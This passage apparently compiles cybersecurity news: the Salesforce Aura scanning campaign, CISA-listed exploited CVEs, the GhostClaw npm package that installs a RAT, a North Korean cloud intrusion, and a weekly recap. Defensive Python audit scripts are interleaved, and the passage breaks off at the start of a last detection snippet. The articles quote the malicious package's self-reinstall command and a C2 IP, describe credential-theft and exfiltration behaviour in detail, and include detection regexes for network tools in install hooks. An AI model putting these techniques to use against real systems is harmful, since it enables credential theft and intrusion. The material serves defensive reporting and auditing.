“This threat actor activity reflects a broader trend of ‘identity-based’ targeting,” it added. “Data harvested in these scans, such as names and phone numbers – is often used to build follow-on targeted social engineering and ‘vishing’ (voice phishing) campaigns.”

Update

According to screenshots shared by Dark Web Informer on X, ShinyHunters has claimed to have breached “several hundred” companies as part of the Salesforce Aura Campaign.
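Added example (not Salesforce’s or Mandiant’s code, and not AuraInspector): a Python audit of the two settings Salesforce’s guidance above turns on, Default External Access per object and what the guest profile can read. It consumes two API responses that are constructed here. The assumptions: the sharing data comes from a Tooling API query of EntityDefinition (QualifiedApiName, InternalSharingModel, ExternalSharingModel), the permission data from an ObjectPermissions query with the parent profile name, and the guest profile name is hypothetical. An object that is both externally accessible by default and readable by the guest profile is the kind of object a modified AuraInspector can pull without logging in.

```python
"""Audit Experience Cloud guest exposure from two constructed Salesforce API
responses. Added example, not Salesforce/Mandiant code.

Assumed queries (not issued here):
  Tooling: SELECT QualifiedApiName, InternalSharingModel, ExternalSharingModel
           FROM EntityDefinition WHERE IsCustomizable = true
  SOQL:    SELECT SobjectType, PermissionsRead, PermissionsCreate, Parent.Profile.Name
           FROM ObjectPermissions"""
import json

SAMPLE_SHARING = json.dumps({"totalSize": 4, "done": True, "records": [
    {"QualifiedApiName": "Account", "InternalSharingModel": "ReadWrite", "ExternalSharingModel": "Private"},
    {"QualifiedApiName": "Contact", "InternalSharingModel": "ReadWrite", "ExternalSharingModel": "Read"},
    {"QualifiedApiName": "Case", "InternalSharingModel": "Private", "ExternalSharingModel": "Private"},
    {"QualifiedApiName": "Support_Ticket__c", "InternalSharingModel": "ReadWrite", "ExternalSharingModel": "ReadWrite"},
]})

SAMPLE_PERMS = json.dumps({"totalSize": 4, "done": True, "records": [
    {"SobjectType": "Contact", "PermissionsRead": True, "PermissionsCreate": False,
     "Parent": {"Profile": {"Name": "Customer Site Guest"}}},
    {"SobjectType": "Support_Ticket__c", "PermissionsRead": False, "PermissionsCreate": True,
     "Parent": {"Profile": {"Name": "Customer Site Guest"}}},
    {"SobjectType": "Account", "PermissionsRead": True, "PermissionsCreate": True,
     "Parent": {"Profile": {"Name": "System Administrator"}}},
    {"SobjectType": "Case", "PermissionsRead": True, "PermissionsCreate": False,
     "Parent": {"Profile": None}},   # granted by a permission set, not a profile
]})

GUEST_PROFILES = {"Customer Site Guest"}  # hypothetical guest profile name


def records(response_json):
    """Unwrap the records array of a Salesforce query response."""
    return json.loads(response_json)["records"]


def objects_with_external_access(sharing_json):
    """Objects whose Default External Access is not Private."""
    return sorted((r["QualifiedApiName"], r["ExternalSharingModel"])
                  for r in records(sharing_json)
                  if r["ExternalSharingModel"] != "Private")


def guest_readable_objects(perms_json, guest_profiles=GUEST_PROFILES):
    """Objects the guest profile(s) hold the Read object permission on."""
    out = set()
    for r in records(perms_json):
        profile = (r.get("Parent") or {}).get("Profile") or {}
        if profile.get("Name") in guest_profiles and r["PermissionsRead"]:
            out.add(r["SobjectType"])
    return sorted(out)


def audit_guest_exposure(sharing_json, perms_json, guest_profiles=GUEST_PROFILES):
    """(severity, object, detail): high when an external default sharing model
    and guest Read combine, which is what an unauthenticated Aura query reaches."""
    readable = set(guest_readable_objects(perms_json, guest_profiles))
    findings = []
    for obj, model in objects_with_external_access(sharing_json):
        if obj in readable:
            findings.append(("high", obj, f"Default External Access {model} and guest profile has Read"))
        else:
            findings.append(("medium", obj, f"Default External Access {model}; set to Private"))
    return sorted(findings)


if __name__ == "__main__":
    for sev, obj, detail in audit_guest_exposure(SAMPLE_SHARING, SAMPLE_PERMS):
        print(f"{sev.upper():6} {obj}: {detail}")
```

The two checks are deliberately separate: setting Default External Access to Private is the fix Salesforce recommends, but a guest profile with Read on an object still exposes whatever records are shared to the guest user through other means, so both lists belong in the review.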
CISA Flags SolarWinds, Ivanti, and Workspace One Vulnerabilities as Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The vulnerability list is as follows -

- CVE-2021-22054 (CVSS score: 7.5) - A server-side request forgery (SSRF) vulnerability in Omnissa Workspace One UEM (formerly VMware Workspace One UEM) that could allow a malicious actor with network access to UEM to send requests without authentication and gain access to sensitive information.
- CVE-2025-26399 (CVSS score: 9.8) - A deserialization of untrusted data vulnerability in the AjaxProxy component of SolarWinds Web Help Desk that could allow an attacker to run commands on the host machine.
- CVE-2026-1603 (CVSS score: 8.6) - An authentication bypass using an alternate path or channel vulnerability in Ivanti Endpoint Manager that could allow a remote unauthenticated attacker to leak specific stored credential data.

The addition of CVE-2025-26399 comes in the wake of reports from Microsoft and Huntress that threat actors are exploiting security flaws in SolarWinds Web Help Desk to obtain initial access. The activity is believed to be the work of the Warlock ransomware crew. CVE-2021-22054, on the other hand, was flagged by GreyNoise in March 2025 as being exploited in conjunction with several other SSRF vulnerabilities in other products as part of a coordinated campaign.
There are currently no details on how CVE-2026-1603 is being weaponized in the wild. As of writing, Ivanti’s security bulletin has not been updated to reflect the exploitation status. To counter the risk posed by active threats, Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply the fix for SolarWinds Web Help Desk by March 12, 2026, and the remaining two by March 23, 2026. “These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise,” CISA said.
Malicious npm Package Posing as OpenClaw Installer Deploys RAT, Steals macOS Credentials
Cybersecurity researchers have discovered a malicious npm package that masquerades as an OpenClaw installer to deploy a remote access trojan (RAT) and steal sensitive data from compromised hosts. The package, named “ @openclaw-ai/openclawai ,” was uploaded to the registry by a user named “openclaw-ai” on March 3, 2026. It has been downloaded 178 times to date. The library is still available for download as of writing.
JFrog, which discovered the package, said it’s designed to steal system credentials, browser data, crypto wallets, SSH keys, Apple Keychain databases, and iMessage history, as well as install a persistent RAT with remote access capabilities, SOCKS5 proxy, and live browser session cloning. It’s tracking the activity under the name GhostClaw. “The attack is notable for its broad data collection, its use of social engineering to harvest the victim’s system password, and the sophistication of its persistence and C2 [command-and-control] infrastructure,” security researcher Meitar Palas said . “Internally, the malware identifies itself as GhostLoader.” The malicious logic is triggered by means of a postinstall hook, which re-installs the package globally using the command: “npm i -g @openclaw-ai/openclawai.” Once the installation is complete, the OpenClaw binary points to “scripts/setup.js” by means of the “bin” property in the “package.json” file.
It’s worth noting that the “bin” field defines executable files that should be added to the user’s PATH when the package is installed, which turns the package into a globally accessible command-line tool. The file “setup.js” serves as the first-stage dropper. When run, it displays a convincing fake command-line interface with animated progress bars to give the impression that OpenClaw is being installed on the host. After the purported installation step completes, the script shows a bogus iCloud Keychain authorization prompt asking the user to enter their system password.
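The postinstall-plus-bin combination described above is visible in the package manifest before anything runs. The following Python script is an added example, not JFrog’s tooling or the package’s own code: it audits a parsed package.json for install-time lifecycle hooks, for hooks that re-install the package globally or reach the network, and for bin entries that such hooks place on PATH. The manifest it checks is constructed to mirror the described pattern under a made-up scope name, and the regexes are the example’s own heuristics rather than anything npm or JFrog publishes.

```python
import json
import re
from typing import Any, Dict, List

# Lifecycle hooks npm runs automatically during `npm install`, before the
# user ever invokes the package.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# `npm i -g pkg`, `npm install --global pkg`, `npm add -g pkg` inside a script line.
GLOBAL_INSTALL_RE = re.compile(
    r"\bnpm\s+(?:i|install|add)\b[^;&|]*?(?<!\S)(?:-g|--global)(?!\S)"
)
# Network fetches launched from an install script.
NETWORK_RE = re.compile(r"\b(?:curl|wget)\b|https?://")


def audit_package_json(manifest: Dict[str, Any]) -> List[str]:
    """Return findings for one parsed package.json (empty list = nothing flagged).

    These are triage heuristics, not proof of malice: native add-ons use
    postinstall legitimately, so every hit deserves a look, not a verdict.
    """
    findings: List[str] = []
    name = manifest.get("name", "<unnamed>")
    scripts: Dict[str, str] = manifest.get("scripts") or {}
    bins = manifest.get("bin") or {}
    if isinstance(bins, str):
        # Shorthand form: the command name is the unscoped package name.
        bins = {name.rsplit("/", 1)[-1]: bins}

    has_hooks = False
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        has_hooks = True
        findings.append(f"{hook}: code runs at install time: {cmd!r}")
        if GLOBAL_INSTALL_RE.search(cmd):
            if name in cmd:
                findings.append(f"{hook}: re-installs {name} globally, putting its bin entries on PATH")
            else:
                findings.append(f"{hook}: installs another package globally")
        if NETWORK_RE.search(cmd):
            findings.append(f"{hook}: reaches out to the network during install")

    # A PATH entry only matters here in combination with install hooks: that
    # pairing is what turns a plain `npm install` into a trojanized CLI.
    if has_hooks:
        for command, target in bins.items():
            findings.append(f"bin: exposes command {command!r} on PATH -> {target!r}")
    return findings


# Constructed manifest mirroring the pattern described above (not the real package).
SAMPLE_MANIFEST: Dict[str, Any] = json.loads("""
{
  "name": "@example-scope/example-cli",
  "version": "1.0.0",
  "scripts": { "postinstall": "npm i -g @example-scope/example-cli" },
  "bin": { "example-cli": "scripts/setup.js" }
}
""")

# Constructed benign manifest: no lifecycle hooks, so its bin entry alone is not flagged.
BENIGN_MANIFEST: Dict[str, Any] = {
    "name": "example-lib",
    "scripts": {"test": "node test.js"},
    "bin": {"example-lib": "bin/cli.js"},
}

if __name__ == "__main__":
    for line in audit_package_json(SAMPLE_MANIFEST):
        print(line)
```

Run it against the manifest inside the tarball from `npm pack`, or the `scripts` and `bin` fields from `npm view <pkg> scripts bin`, before installing. To take install-time execution off the table entirely, `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops npm from running these hooks at all, at the cost of breaking packages that legitimately compile native code in postinstall.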
Simultaneously, the script retrieves an encrypted second-stage JavaScript payload from the C2 server (“trackpipe[.]dev”), which is then decoded, written to a temporary file, and spawned as a detached child process so that it keeps running in the background. The temp file is deleted after 60 seconds to cover up traces of the activity.

“If the Safari directory is inaccessible (no Full Disk Access), the script displays an AppleScript dialog urging the user to grant FDA to Terminal, complete with step-by-step instructions and a button that opens System Preferences directly,” JFrog explained. “This enables the second-stage payload to steal Apple Notes, iMessage, Safari history, and Mail data.”

The roughly 11,700-line JavaScript second stage is a full-fledged information stealer and RAT framework capable of persistence, data collection, browser decryption, C2 communication, a SOCKS5 proxy, and live browser cloning.
It’s also equipped to steal a wide range of data -
- macOS Keychain, including both the local login.keychain-db and all iCloud Keychain databases
- Credentials, cookies, credit cards, and autofill data from all Chromium-based browsers, such as Google Chrome, Microsoft Edge, Brave, Vivaldi, Opera, Yandex, and Comet
- Data from desktop wallet applications and browser extensions
- Cryptocurrency wallet seed phrases
- SSH keys
- Developer and cloud credentials for AWS, Microsoft Azure, Google Cloud, Kubernetes, Docker, and GitHub
- Artificial intelligence (AI) agent configurations, and
- Data protected by FDA, including Apple Notes, iMessage history, Safari browsing history, Mail account configurations, and Apple account information

In the final stage, the collected data is compressed into a tar.gz archive and exfiltrated through multiple channels, including directly to the C2 server, the Telegram Bot API, and GoFile.io. What’s more, the malware enters a persistent daemon mode in which it monitors clipboard content every three seconds and transmits anything that matches one of nine pre-defined patterns corresponding to private keys, WIF keys, SOL private keys, RSA private keys, BTC addresses, Ethereum addresses, AWS keys, OpenAI keys, and Strike keys.

Other features include keeping tabs on running processes, scanning incoming iMessage chats in real time, and executing commands sent from the C2 server to run arbitrary shell commands, open a URL in the victim’s default browser, download additional payloads, upload files, start/stop a SOCKS5 proxy, list available browsers, clone a browser profile and launch it in headless mode, stop the browser clone, self-destruct, and update itself. The browser cloning function is particularly dangerous, as it launches a headless Chromium instance with the existing browser profile, which contains cookies, logins, and history data.
This gives the attacker a fully authenticated browser session without needing the underlying credentials. “The @openclaw-ai/openclawai package combines social engineering, encrypted payload delivery, broad data collection, and a persistent RAT into a single npm package,” JFrog said. “The polished fake CLI installer and Keychain prompt are convincing enough to extract system passwords from cautious developers, and once captured, those credentials unlock macOS Keychain decryption and browser credential extraction that would otherwise be blocked by OS-level protections.”

Update: The package has been removed from the npm registry as of March 10, 2026.
UNC4899 Breached Crypto Firm After Developer AirDropped Trojanized File to Work Device
The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency. Google Cloud has attributed the activity with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor. “This incident is notable for its blend of social engineering, exploitation of personal-to-corporate device peer-to-peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living-off-the-cloud (LOTC) techniques,” the company noted in its H1 2026 Cloud Threat Horizons Report shared with The Hacker News. Upon gaining access to the cloud environment, the attackers are said to have abused legitimate DevOps workflows to harvest credentials, break out of the confines of containers, and tamper with Cloud SQL databases to facilitate the cryptocurrency theft.
The attack chain, Google Cloud said, progressed from the compromise of a developer’s personal device to their corporate workstation and then to the cloud, where unauthorized modifications were made to the financial logic. It all started with the threat actors using social engineering ploys to deceive the developer into downloading an archive file as part of a supposed open-source project collaboration. The developer then transferred the same file to their company device over AirDrop. “Using their AI-assisted Integrated Development Environment (IDE), the victim then interacted with the archive’s contents, eventually executing the embedded malicious Python code, which spawned and executed a binary that masqueraded as the Kubernetes command-line tool,” Google said.
The binary then contacted an attacker-controlled domain and acted as a backdoor on the victim’s corporate machine, giving the attackers a way to pivot into the Google Cloud environment, likely by using authenticated sessions and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects. The attack moved to the next phase with the discovery of a bastion host, with the adversary modifying its multi-factor authentication (MFA) policy attribute to access it and perform additional reconnaissance, including navigating to specific pods within the Kubernetes environment. Subsequently, UNC4899 adopted a living-off-the-cloud (LotC) approach to configure persistence, altering Kubernetes deployment configurations so that a bash command executed automatically whenever new pods were created.
The command, for its part, downloaded a backdoor. Some of the other steps carried out by the threat actor are listed below -
- Kubernetes resources tied to the victim’s CI/CD platform were modified to inject commands that wrote service account tokens to the logs.
- The attacker obtained a token for a high-privileged CI/CD service account, permitting them to escalate their privileges and move laterally, specifically targeting a pod that handled network policies and load balancing.
- The stolen service account token was used to authenticate to the sensitive infrastructure pod, which ran in privileged mode, escape the container, and deploy a backdoor for persistent access.
Another round of reconnaissance was conducted by the threat actor before shifting their attention to a workload responsible for managing customer information, such as user identities, account security, and cryptocurrency wallet information. The attacker used it to extract static database credentials that were stored insecurely in the pod’s environment variables. The credentials were then abused to access the production database via Cloud SQL Auth Proxy and execute SQL commands to make user account modifications. This included password resets and MFA seed updates for several high-value accounts.
The attack culminated with the use of the compromised accounts to successfully withdraw several million dollars in digital assets. The incident “highlights the critical risks posed by the personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense-in-depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.”

To counter the threat, organizations are advised to implement context-aware access and phishing-resistant MFA, ensure only trusted images are deployed, isolate compromised nodes so they cannot connect to external hosts, monitor for unexpected container processes, adopt robust secrets management, and enforce policies that disable or restrict peer-to-peer file sharing over AirDrop or Bluetooth and the mounting of unmanaged external media on corporate devices.
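Three of the weaknesses Google calls out (privileged container mode, static secrets in pod environment variables, and service account tokens sitting in pods where they can be harvested) are visible in the workload manifest before any incident. The Python function below is an added example, not Google’s or the victim’s code: it audits a Pod manifest for shared host namespaces, the default auto-mounted service account token, privileged containers, and env vars that carry a credential as a plain value rather than a Secret reference. Both manifests it runs on are constructed, and the name/value patterns that decide what counts as a secret are the example’s own heuristics.

```python
import re
from typing import Any, Dict, List

# Env var names that usually carry a credential (heuristic).
SECRET_NAME_RE = re.compile(
    r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY|CREDENTIAL", re.IGNORECASE
)
# Inline values that look like a credential even when the name is innocuous:
# a database URL with embedded user:password, or an AWS access key ID.
SECRET_VALUE_RE = re.compile(
    r"^(?:postgres(?:ql)?|mysql|mongodb(?:\+srv)?|redis)://[^:/@\s]+:[^@\s]+@|^AKIA[0-9A-Z]{16}$"
)


def audit_pod(pod: Dict[str, Any]) -> List[str]:
    """Flag, in one Pod manifest, the conditions the intrusion above relied on:
    privileged containers, shared host namespaces, an auto-mounted service
    account token, and static secrets passed as plain env values."""
    findings: List[str] = []
    meta = pod.get("metadata") or {}
    spec = pod.get("spec") or {}
    ident = f"{meta.get('namespace', 'default')}/{meta.get('name', '<unnamed>')}"

    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(key):
            findings.append(f"{ident}: shares the host namespace ({key}: true)")

    # Unless explicitly disabled, every pod gets its service account token
    # mounted under /var/run/secrets/kubernetes.io/serviceaccount, which is
    # what makes a compromised pod a place to harvest one from.
    if spec.get("automountServiceAccountToken", True):
        findings.append(f"{ident}: service account token is auto-mounted (default)")

    for container in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        cname = container.get("name", "<unnamed>")
        sec = container.get("securityContext") or {}
        if sec.get("privileged"):
            findings.append(f"{ident}/{cname}: privileged: true (container escape gives node access)")

        for env in container.get("env") or []:
            if "value" not in env:
                continue  # valueFrom.secretKeyRef / configMapKeyRef: not an inline secret
            name, value = env.get("name", ""), str(env["value"])
            if SECRET_NAME_RE.search(name) or SECRET_VALUE_RE.search(value):
                findings.append(
                    f"{ident}/{cname}: env {name} holds a static credential inline; "
                    f"move it to a Secret and reference it with valueFrom.secretKeyRef"
                )
    return findings


# Constructed manifest mirroring the reported weaknesses (not the victim's real workload).
SAMPLE_POD: Dict[str, Any] = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "accounts-api", "namespace": "prod"},
    "spec": {
        "hostNetwork": True,
        "containers": [{
            "name": "api",
            "image": "registry.example.internal/accounts-api:1.4.2",
            "securityContext": {"privileged": True},
            "env": [
                {"name": "LOG_LEVEL", "value": "info"},
                {"name": "DATABASE_URL", "value": "postgres://app:Sup3rS3cret@db.internal:5432/ledger"},
                {"name": "JWT_SIGNING_KEY", "valueFrom": {"secretKeyRef": {"name": "api-keys", "key": "jwt"}}},
            ],
        }],
    },
}

# Constructed hardened version of the same workload.
HARDENED_POD: Dict[str, Any] = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "accounts-api", "namespace": "prod"},
    "spec": {
        "automountServiceAccountToken": False,
        "containers": [{
            "name": "api",
            "image": "registry.example.internal/accounts-api:1.4.2",
            "securityContext": {"privileged": False, "allowPrivilegeEscalation": False, "runAsNonRoot": True},
            "env": [
                {"name": "LOG_LEVEL", "value": "info"},
                {"name": "DATABASE_URL", "valueFrom": {"secretKeyRef": {"name": "db-creds", "key": "url"}}},
            ],
        }],
    },
}

if __name__ == "__main__":
    for finding in audit_pod(SAMPLE_POD):
        print(finding)
```

Feed it the JSON from `kubectl get pod -o json` (the same `spec` shape sits inside a Deployment’s pod template) and treat the output as review input rather than a verdict: a privileged container is sometimes unavoidable for a CNI or storage daemon, which is exactly why such workloads belong in their own namespace and node pool, away from anything that holds customer data.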
⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack & Vibe-Coded Malware
Another week in cybersecurity. Another week of “you’ve got to be kidding me.” Attackers were busy. Defenders were busy. And somewhere in the middle, a whole lot of people had a very bad Monday morning.
That’s kind of just how it goes now. The good news? There were some actual wins this week. Real ones.
The kind where the good guys showed up, did the work, and made a dent. It doesn’t always happen, so when it does, it’s worth noting. The bad news? For every win, there’s a fresh headache waiting right behind it.
New tricks, old tricks dressed up in new clothes, and a few things that’ll make you want to go touch grass and never log back in. But you will. We all do. So here’s everything that mattered this week — the wins, the warnings, and the stuff you really shouldn’t ignore.
⚡ Threat of the Week

Tycoon 2FA and LeakBase Operations Dismantled — The infrastructure hosting the Tycoon 2FA service, which Europol said was among the largest adversary-in-the-middle (AitM) phishing operations worldwide, has been dismantled by a coalition of security companies and law enforcement agencies. “Taking down infrastructure associated with Tycoon 2FA and identifying the individual allegedly responsible for creating this prolific hacking tool will have a significant impact on overall MFA credential phishing, and hopefully strike a blow to the world’s most prolific AitM phishing-as-a-service,” Proofpoint said in a statement shared with The Hacker News. Phishing kits and PhaaS platforms have become a major enabler of attacks in recent years, streamlining and democratizing phishing for less technically savvy hackers by providing them with a suite of tools to create convincing emails and phishing pages that unsuspecting victims will engage with. For a relatively modest fee, aspiring cybercriminals can subscribe to these services and carry out phishing attacks at scale.
In a similar development, authorities also took down LeakBase, one of the world’s largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. While the disruption is a positive development, such takedowns typically create only short-term disruptions, as the ecosystem adapts by migrating to other forums or to more resilient distribution channels, like Telegram.
🔔 Top News

Anthropic Finds 22 Vulnerabilities in Firefox — Anthropic said it discovered 22 new security vulnerabilities in the Firefox web browser using its Claude Opus 4.6 large language model (LLM) as part of a security partnership with Mozilla. Of these, 14 have been classified as high, seven as moderate, and one as low in severity. The issues were addressed in Firefox 148, released late last month.
The vulnerabilities were identified over a two-week period in January 2026. The company noted that finding vulnerabilities is cheaper than writing exploits for them, and that the model is better at finding issues than at exploiting them.

Qualcomm Flaw Exploited in the Wild — A high-severity security flaw impacting Qualcomm chips used in Android devices has been exploited in the wild. The vulnerability in question is CVE-2026-21385 (CVSS score: 7.8), a buffer over-read in the Graphics component that could result in memory corruption and arbitrary code execution.
There are currently no details on how the vulnerability is being exploited. However, Google acknowledged in its monthly Android security bulletin that “there are indications that CVE-2026-21385 may be under limited, targeted exploitation.”

Coruna iOS Exploit Kit Uses 23 Exploits Against Older iOS Devices — Google disclosed details of a new and powerful exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, the company said. What makes it different is its trajectory: it started with a commercial surveillance vendor in February 2025, was picked up by what appears to be a Russian espionage group targeting Ukrainians in July 2025, and ended up in the hands of financially motivated attackers in China going after crypto wallets by the end of the year.
Coruna began its life as a surveillance exploit kit, but by the time it reached the Chinese cybercrime gang, it was heavily focused on financial theft. It’s not known how the exploit kit passed between multiple threat actors of varied motivations, which raises the possibility of a secondhand market where such kits are resold to other threat actors, who repurpose them for their own objectives.

Transparent Tribe Unleashes Vibeware Against Indian Entities — In a new attack campaign detected by Bitdefender, the Pakistan-aligned threat actor known as Transparent Tribe has leveraged artificial intelligence (AI)-powered coding tools to vibe-code malware and used it to target the Indian government and its embassies in multiple foreign countries.
These tools are written in niche programming languages like Nim, Zig, and Crystal so as to evade detection. “Rather than a breakthrough in technical sophistication, we are seeing a transition toward AI-assisted malware industrialization that allows the actor to flood target environments with disposable, polyglot binaries,” the company said.

Iranian Hackers Target U.S. Entities Amid Conflict — The Iranian hacking group tracked as MuddyWater (aka Seedworm) targeted several U.S. companies, including banks, airports, and a non-profit, as well as the Israeli arm of a software company, as part of a campaign that began in early February 2026 and continued after the joint U.S.-Israel military strikes on Iran toward the end of the month. The development comes against the backdrop of hacktivist-fueled cyber attacks, with wiper campaigns targeting the Israeli energy, financial, government, and utilities sectors. “The trajectory is clear: what began as nation-state-level ICS capability in 2012 [with Shamoon wiper] has become, by 2026, something any motivated actor can attempt with free tools and an internet connection,” CloudSEK said in a report last week. “The technical barrier has collapsed. The threat pool has expanded. And the US attack surface has never been larger.”

Another targeted campaign has distributed a trojanized version of the Red Alert rocket warning Android app to Israeli users via SMS messages impersonating official Home Front Command communications. Once installed, the malware abuses the granted permissions to collect sensitive data, including SMS messages, contacts, location data, device accounts, and installed applications. The campaign is believed to be the work of a Hamas-affiliated actor known as Arid Viper. There are currently no details available on the scope of the campaign or whether any of the infections were successful. Acronis said it highlights how trusted emergency services can be weaponized through social engineering during periods of geopolitical tension.

🔥 Trending CVEs

New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community.
Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-2796 (Mozilla Firefox), CVE-2026-21385 (Qualcomm), CVE-2026-2256 (MS-Agent), CVE-2026-26198 (Ormar), CVE-2026-27966 (Langflow), CVE-2025-64712 (Unstructured.io), CVE-2026-24009 (Docling), CVE-2026-23600 (HPE AutoPass License Server), CVE-2026-27636, CVE-2026-28289 (aka Mail2Shell) (FreeScout), CVE-2025-67736 (FreePBX), CVE-2025-34288 (Nagios XI), CVE-2025-14500 (IceWarp), CVE-2026-20079 (Cisco Secure Firewall Management Center), CVE-2025-13476 (Viber app for Android), CVE-2026-3336, CVE-2026-3337, CVE-2026-3338 (Amazon AWS-LC), CVE-2026-25611 (MongoDB), CVE-2026-3536, CVE-2026-3537, CVE-2026-3538 (Google Chrome), CVE-2026-27970 (Angular), CVE-2026-29058 (AVideo), a privilege escalation flaw in IPVanish VPN for macOS (no CVE), and a remote code execution vulnerability in Ghost CMS (no CVE).

🎥 Cybersecurity Webinars

Automating Real-World Security Testing to Prove What Actually Works → Running a security test once a year and hoping for the best? That’s not a strategy anymore. This webinar shows you how to continuously test your defenses using real attack techniques — so you actually know what holds up and what quietly breaks when no one’s looking.
When AI Agents Become Your New Attack Surface → AI tools aren’t just answering questions anymore — they’re browsing the web, hitting APIs, and touching your internal systems. That changes everything about how you think about risk. This webinar breaks down what that means for security, and what you actually need to do before something goes wrong.

📰 Around the Cyber World

New AirSnitch Attack Shows Wi-Fi Client Isolation May Not Be Enough — A group of academics has developed a new attack called AirSnitch that bypasses Wi-Fi client isolation, the mechanism meant to keep devices on the same network from reaching one another.
Xin’an Zhou, the lead author of the research paper, told Ars Technica that AirSnitch bypasses worldwide Wi-Fi encryption and that it “might have the potential to enable advanced cyber attacks.” The attack, at its core, leverages three weaknesses in client isolation implementations: (1) it abuses the group key(s) shared between all clients on the same Wi-Fi network, (2) it bypasses client isolation by tricking the gateway into forwarding packets to the victim at the IP layer, taking advantage of the fact that many networks only enforce isolation at the MAC/Ethernet layer, and (3) it lets an adversary manipulate internal switches and bridges into forwarding the victim’s uplink and downlink traffic to the adversary. Together, these restore AitM capabilities even when client isolation is enabled. “We found that Wi-Fi client isolation can often be bypassed,” Mathy Vanhoef said. “This allows an attacker who can connect to a network, either as a malicious insider or by connecting to a co-located open network, to attack others.”

Google Tracked 90 Exploited 0-Days in 2025 — Google said it tracked 90 zero-day vulnerabilities exploited in the wild in 2025, up from 78 in 2024 and down from 100 in 2023.
“Both the raw number (43) and proportion (48%) of vulnerabilities impacting enterprise technologies reached all-time highs, accounting for almost 50% of total zero-days exploited in 2025,” the company said. Of these, vulnerabilities in security and networking appliances made up about half (21) of the enterprise-related zero-days in 2025. Mobile zero-days rebounded from nine in 2024 to 15 in 2025. For the first time, commercial surveillance vendors (15, plus likely another three) were behind more exploited zero-days than state-sponsored cyber espionage groups (12). The names of the commercial spyware companies were not disclosed.
Microsoft had the largest number of actively exploited flaws at 25, followed by Google (11), Apple (8), Cisco (4), Fortinet (4), Ivanti (3), and Broadcom VMware (3). Memory safety issues accounted for 35% of all exploited zero-day vulnerabilities last year. Financially motivated threat groups, including ransomware gangs, also targeted enterprise technologies and accounted for nine zero-days in 2025, double the five attributed to them in 2024. Velvet Tempest Deploys ClickFix Attack — Velvet Tempest (aka DEV-0504) has been observed using a ClickFix lure, followed by hands-on-keyboard activity consistent with Termite ransomware tradecraft.
According to a report by Deception.Pro, the attack used the social engineering technique to drop payloads like DonutLoader and CastleRAT. “Follow-on activity included Active Directory reconnaissance (domain trusts, server discovery, user listing) and attempted browser credential harvesting via a PowerShell script downloaded from 143.198.160[.]37,” it said. “Telemetry and infrastructure in this chain align with a modern initial-access playbook: rapid staging, heavy use of living-off-the-land binaries (LOLBins), and long-lived command-and-control (C2) traffic that blends into normal browser noise.” No ransomware was deployed in the attack, which took place between February 3 and 16, 2026.

Ghanaian National Pleads Guilty to Role in $100M Romance Scam — A Ghanaian national has pleaded guilty to his role in a massive fraud ring that stole over $100 million from victims across the U.S. through business email compromise attacks and romance scams. 40-year-old Derrick Van Yeboah pleaded guilty to conspiracy to commit wire fraud and agreed to pay more than $10 million in restitution. “Van Yeboah personally perpetrated many of the romance scams by impersonating fake romantic partners in communications with victims,” the U.S. Justice Department said.
“Many of the conspiracy’s victims were vulnerable older men and women who were tricked into believing that they were in online romantic relationships with persons who were, in fact, fake identities assumed by members of the conspiracy.” The conspirators, part of a criminal organization primarily based in Ghana, also committed business email compromises to deceive businesses into wiring funds to the enterprise. In total, the scheme stole and laundered more than $100 million from dozens of victims. The stolen funds were then laundered to West Africa. The defendant is scheduled to be sentenced in June 2026.
Taiwan Indicts 62 People for Cyber Scams — Prosecutors in Taipei indicted 62 people and 13 companies for their involvement in cyber scam operations run across Asia by the Prince Group. Chen Zhi, the founder of the Prince Group, was indicted by U.S. prosecutors last year on money laundering charges. Taipei prosecutors said those associated with Prince Group laundered at least $339 million into Taiwan and used the stolen funds to buy 24 properties, 35 vehicles, and other assets amounting to approximately $1.7 million.
In all, authorities seized about $174 million in cash and assets. Prince Group “effectively controlled 250 offshore companies in 18 countries, holding 453 domestic and international financial accounts. By creating fictitious transaction contracts between these offshore companies, the group laundered money through foreign exchange channels,” they added.

Ransomware Actors Use AzCopy — Ransomware operators are ditching the usual tools like Rclone for Microsoft’s own AzCopy, turning a trusted Azure utility into a stealthy data exfiltration mechanism that blends into normal activity.
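The blending-in problem here becomes tractable once you know which storage accounts your organisation actually owns: an approved copy tool pointed at an approved account is noise, and the same tool pointed anywhere else is the pattern to alert on. The Python snippet below is an added example, not Varonis’s or any vendor’s detection logic. It triages process-creation events for azcopy/rclone, pulls the Azure Storage account name out of the command line, and raises an alert when that account is outside an allowlist, or when the destination is hidden behind a named remote and cannot be checked at all. The events, hostnames and account names are constructed, and the event fields are a generic schema rather than a specific EDR product’s.

```python
import re
from typing import Dict, Iterable, List, Set

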